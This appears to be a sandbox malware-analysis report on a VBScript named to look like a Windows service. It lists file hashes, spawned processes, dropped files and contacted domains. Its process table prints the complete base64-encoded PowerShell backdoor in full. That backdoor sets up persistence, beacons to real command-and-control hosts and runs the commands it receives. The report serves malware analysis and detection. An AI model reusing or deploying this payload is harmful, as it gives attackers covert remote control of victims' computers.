File name: | WindowsIndexingService.vbs |
Full analysis: | https://app.any.run/tasks/cf2b6ce4-b0d9-4577-91e7-3aaaa2f47481 |
Verdict: | Malicious activity |
Analysis date: | September 30, 2020, 05:45:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR, LF line terminators |
MD5: | 0AEA1021644435608A5EDE3EA42D6184 |
SHA1: | 52AB936F044F2773B13D8F0A86D17CEC6B7D5870 |
SHA256: | 251CCBEEFC011D9A1487C6180BC537EB745B4F9E7DF2573E9D307E4F5227074A |
SSDEEP: | 3072:oiGyHGI6rdKilInLx5lFiH9hQOxZd4A+Lc2Cw36aYd3UY1W1k1oK9U/OAm:ogHGBXlWPlmLzg479DyrG |
.txt | | | Text - UTF-16 (LE) encoded (66.6) |
---|---|---|
.mp3 | | | MP3 audio (33.3) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3140 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\WindowsIndexingService.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3220 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHl1aHNkdmZhID0gJGVudjpQVUJMSUMgKyAiXExpYnJhcmllcyIKaWYgKC1ub3QgKFRlc3QtUGF0aCAkeXVoc2R2ZmEpKSB7IG1kICR5dWhzZHZmYTsgfQokaWdqeWR5Y2MgPSAkeXVoc2R2ZmEgKyAiXFdpbmRvd3NJbmRleGluZ1NlcnZpY2UudmJzIjsKJGN3aWV4anV2aCAgPSAiMTAyOS40IjsKJGpmc3p1ZGF3dXkgPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiR2d2RzeXpodCAgPSAkeXVoc2R2ZmEgKyAiXHRodW1iY2FjaGVfNjQuZGIiOwokbXl1cmxwb3N0ID0gJGZhbHNlOwokaWZkanV5aXVmeiA9ICJ3IjsKCmZ1bmN0aW9uIGlhbXdvcmsyeyBzYyAtUGF0aCAkamZzenVkYXd1eSAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIHlpenR2d3RlYiggJHV1ZmFjZ3Z2ZXcgKXsKICBpZiggJHV1ZmFjZ3Z2ZXcgLW1hdGNoICdPdXRPZk1lbW9yeUV4Y2VwdGlvbicgKXsKICAgIHJpIC1QYXRoICRqZnN6dWRhd3V5IC1Gb3JjZTsKICAgIGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzOwogICAgZXhpdDsKICB9Owp9CgpmdW5jdGlvbiBzZW5kcG9zdDIoICR1dWZhY2d2dmV3ICl7CiAgaWYoICEkbXl1cmxwb3N0ICl7IHJldHVybiAkZmFsc2U7IH07CiAgJHljd2pkc2VneiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7CiAgJHljd2pkc2Vnei5DcmVkZW50aWFscyA9IFtTeXN0ZW0uTmV0LkNyZWRlbnRpYWxDYWNoZV06OkRlZmF1bHRDcmVkZW50aWFsczsKICAkeWN3amRzZWd6LkhlYWRlcnMuQWRkKCJDb250ZW50LVR5cGUiLCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIik7CiAgJHljd2pkc2Vnei5FbmNvZGluZyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7CiAgdHJ5ewogICAgJGVheXhidXRmID0gJHljd2pkc2Vnei5VcGxvYWRTdHJpbmcoICRteXVybHBvc3QsICJsPSIrW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoICggInY9JGN3aWV4anV2aCZndWlkPSRhamV0dXdiZXp2JiIgKyAkdXVmYWNndnZldyApICkgKSApOwogICAgJGVheXhidXRmID0gW3N0cmluZ11bU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyggJGVheXhidXRmICkgKTsKICAgIGlmKCAhJGlmZGp1eWl1ZnogKXsgcmV0dXJuICRmYWxzZTsgfQogICAgaWYoICRnaWh3dWhqIC1lcSAkZWF5eGJ1dGYuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkZWF5eGJ1dGYuU3Vic3RyaW5nKDE2LCRlYXl4YnV0Zi5sZW5ndGgtMTYpIDsKICAgIH1lbHNlewogICAgICAkaWZkanV5aXVmeiA9ICRmYWxzZTsKICAgICAgc2VuZHBvc3QyICgiZXJyb3I9IiArIFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkZWF5eGJ1dGYgKSApICk7CiAgICB9CiAgfWNhdGNoewogICAgeWl6dHZ3dGViICRfLkV4Y2VwdGlvbi5NZXNzYWdlOwogICAgJGlmZGp1eWl1ZnogPSAkZmFsc2U7CiAgICAkeWN3amRzZWd6LlVwbG9hZFN0cmluZyggJG15dXJscG9zdCwgImw9IitbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggKCAidj0kY3dpZXhqdXZoJmd1aWQ9JGFqZXR1d2JlenYmZXJyb3I9c2VuZHBvc3QyOiIgKyAkbXl1cmxwb3N0KyI6IiskZWF5eGJ1dGYgKyI6IisgJF8uRXhjZXB0aW9uLk1lc3NhZ2UgKSApICkgKTsKICB9OwogIHJldHVybiAkZmFsc2U7Cn07CgpmdW5jdGlvbiBjeGZ3dGh2KCAkYWRzd3l4ZGYgKXsKICAkY3V5Z3lpd2ZpID0gImh0dHA6Ly9ob21lLmRvdWdsYXNzaG9tZS5jb20vIjsKICAiaGVlIiwieHUxIiwiaHMwIiwiamQ1IiwibXFmIiB8ICV7ICRjdXlneWl3ZmkgKz0gIiwiKyJodHRwOi8vIisgKCBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkXysgJChHZXQtRGF0ZSAtVUZvcm1hdCAiJXklbSVWIikgKSApLnRvTG93ZXIoKSApICsiLnRvcC8iOyB9OwogICRjdXlneWl3Zmkuc3BsaXQoIiwiKSB8ICV7CiAgICBpZiggISRteXVybHBvc3QgKXsKICAgICAgJG15dXJscG9zdCA9ICRfOwogICAgICBpZiggIShzZW5kcG9zdDIgKCRhZHN3eXhkZiArICImZG9tZW49JG15dXJscG9zdCIgKSkgKXsgJG15dXJscG9zdCA9ICRmYWxzZTsgfTsKICAgICAgU3RhcnQtU2xlZXAgLXMgNTsKICAgIH0KICB9OwogIGlmKCAkYWRzd3l4ZGYgLW1hdGNoICJzdGF0dXM9cmVnaXN0ZXIiICl7CiAgICByZXR1cm4gIm9rIjsKICB9ZWxzZXsKICAgIHJldHVybiAkbXl1cmxwb3N0OwogIH0gCn07CgppZiAoIFRlc3QtUGF0aCAkamZzenVkYXd1eSApewogIGlmICggKCAoIE5FVy1USU1FU1BBTiAtU3RhcnQgKChHZXQtQ2hpbGRJdGVtICRqZnN6dWRhd3V5ICkuQ3JlYXRpb25UaW1lKSAtRW5kIChHZXQtRGF0ZSkpLk1pbnV0ZXMgKSAtZ3QgMTUgKXsKICAgIHJpIC1QYXRoICRqZnN6dWRhd3V5IC1Gb3JjZTsKICAgIHRyeXsgZ2V0LXByb2Nlc3MgcG93ZXJzaGVsbCogfCBzdG9wLXByb2Nlc3MgfWNhdGNoe307CiAgICBleGl0OwogIH1lbHNleyBleGl0OyB9Owp9OwoKZnVuY3Rpb24gdWlpc2RqZHgoICR6Z3Z4aHd3d2l3ICl7CiAgaWYoICR6Z3Z4aHd3d2l3ICl7CiAgICBzYyAtUGF0aCAkdndkc3l6aHQgLVZhbHVlICggW2d1aWRdOjpOZXdHdWlkKCksICggW2d1aWRdOjpOZXdHdWlkKCkgLXJlcGxhY2UgJy0nLCcnICkuU3Vic3RyaW5nKDAsMTYpICAtam9pbiAnLCcgKSAtRm9yY2U7ICAKICAgIGdpICR2d2RzeXpodCAtRm9yY2UgfCAgJXsgJF8uQXR0cmlidXRlcyA9ICJIaWRkZW4iIH07CiAgICB0cnl7CiAgICAgICRmdHhhd2N5aHN0ID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzQXBwbGljYXRpb25TZXJ2aWNlLmxuayc7CiAgICAgIGlmKCAtbm90ICggVGVzdC1QYXRoICRmdHhhd2N5aHN0ICkgKXsKICAgICAgICAkY3hjdHNqeCA9IE5ldy1PYmplY3QgLUNvbU9iamVjdCAoJ1dTY3JpcHQuU2hlbGwnKTsKICAgICAgICAkaXpzd3pkeHhkaSA9ICRjeGN0c2p4LkNyZWF0ZVNob3J0Y3V0KCAkZnR4YXdjeWhzdCAgKTsKICAgICAgICAkaXpzd3pkeHhkaS5UYXJnZXRQYXRoID0gJGlnanlkeWNjOwogICAgICAgICRpenN3emR4eGRpLldvcmtpbmdEaXJlY3RvcnkgPSAkeXVoc2R2ZmE7CiAgICAgICAgJGl6c3d6ZHh4ZGkuV2luZG93U3R5bGUgPSAxOwogICAgICAgICRpenN3emR4eGRpLkRlc2NyaXB0aW9uID0gJ1dpbmRvd3MgQXBwbGljYXRpb24gU2VydmljZSc7CiAgICAgICAgJGl6c3d6ZHh4ZGkuU2F2ZSgpOwogICAgICB9CiAgICB9Y2F0Y2h7fTsKICAgICRhamV0dXdiZXp2LCAkZ2lod3VoaiA9IChnZXQtY29udGVudCAkdndkc3l6aHQpLnNwbGl0KCcsJyk7CiAgICAkZnlmdWJ0YSA9ICJzdGF0dXM9cmVnaXN0ZXImc3NpZD0kZ2lod3VoaiZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJHl1aHNkdmZhICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApICl7CiAgICAgIHJpIC1QYXRoICggJHl1aHNkdmZhICsgIlx0aHVtYmNhY2hlXzMzLmRiIiApLCAoICR5dWhzZHZmYSArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkdWRiaXRhaWcgPSBjeGZ3dGh2ICRmeWZ1YnRhOwogICAgaWYoICR1ZGJpdGFpZyAtbmUgIm9rIil7CiAgICAgIHJpIC1QYXRoICR2d2RzeXpodCAtRm9yY2U7CiAgICAgIGV4aXQ7CiAgICB9CiAgfQogIHJldHVybiAoZ2V0LWNvbnRlbnQgJHZ3ZHN5emh0KS5zcGxpdCgnLCcpOwp9CiR4Y3ZjaWhnaHogPSAoc2NodGFza3MuZXhlIC9jcmVhdGUgL1ROICJXaW5kb3dzQXBwbGljYXRpb25TZXJ2aWNlIiAvc2MgREFJTFkgL3N0IDAwOjAwIC9mIC9SSSAxMSAvZHUgMjM6NTkgL1RSICRpZ2p5ZHljYyk7IAppZiAoIFRlc3QtUGF0aCAkdndkc3l6aHQgKXsKICAkYWpldHV3YmV6diwgJGdpaHd1aGogPSAgdWlpc2RqZHggJGZhbHNlOwogIGlmKCAkZ2lod3Voai5sZW5ndGggLW5lIDE2ICApeyAkYWpldHV3YmV6diwgJGdpaHd1aGogPSAgdWlpc2RqZHggJHRydWU7IH0KfWVsc2V7CiAgJGFqZXR1d2JlenYsICRnaWh3dWhqID0gIHVpaXNkamR4ICR0cnVlOwp9CiRteXVybHBvc3QgPSBjeGZ3dGh2Owp3aGlsZSggJGlmZGp1eWl1ZnogKXsKICBpYW13b3JrMjsKICB0cnl7CiAgICBpZiggJGlmZGp1eWl1ZnogLWFuZCAoJGlmZGp1eWl1ZnoubGVuZ3RoIC1ndCAzMCkgICl7CiAgICAgIGlleCAkaWZkanV5aXVmejsKICAgIH07CiAgfWNhdGNoeyB5aXp0dnd0ZWIgJF8uRXhjZXB0aW9uLk1lc3NhZ2U7IH07CiAgU3RhcnQtU2xlZXAgLXMgMjgwOwogICRpZmRqdXlpdWZ6ID0gc2VuZHBvc3QyOwp9OwpyaSAtUGF0aCAkamZzenVkYXd1eSAtRm9yY2U7Cg==' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3408 | "C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 11 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs | C:\Windows\system32\schtasks.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1800 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ISMQL68T9LEFDVNAMSOI.temp | — | |
MD5:— | SHA256:— | |||
3220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3ba559.TMP | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
3220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4028388263805ABA00088A0BA4EEA515 | SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948 | |||
3220 | powershell.exe | C:\Users\Public\Libraries\thumbcache_64.db | text | |
MD5:2FB398419AFE6CEB94EDFEC76145CF54 | SHA256:3A6A943D23002BAEDD99B9CB900FA25D30868A33A714DE23B62EEC76D8FFFB49 | |||
3220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsApplicationService.lnk | lnk | |
MD5:C2C2F6BECD4CEAFF6E0032C9E61FBE5D | SHA256:260987085230BA1138002871584A99628300529E1A06EDF6E9E14A093482293F | |||
3220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\AFX50058.tmp | text | |
MD5:83F34C002D61CCE9201D84279CF55BC9 | SHA256:AA86ADF100838AD269DEFD8D4D11C9C98630E1642D480CAA6675CC44E0CAEBE3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3220 | powershell.exe | 185.219.221.100:80 | home.douglasshome.com | 23media GmbH | — | malicious |
Domain | IP | Reputation |
---|---|---|
home.douglasshome.com |
| malicious |
agvlmjawotqw.top |
| unknown |
ehuxmjawotqw.top |
| unknown |
ahmwmjawotqw.top |
| unknown |
amq1mjawotqw.top |
| unknown |
bxfmmjawotqw.top |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |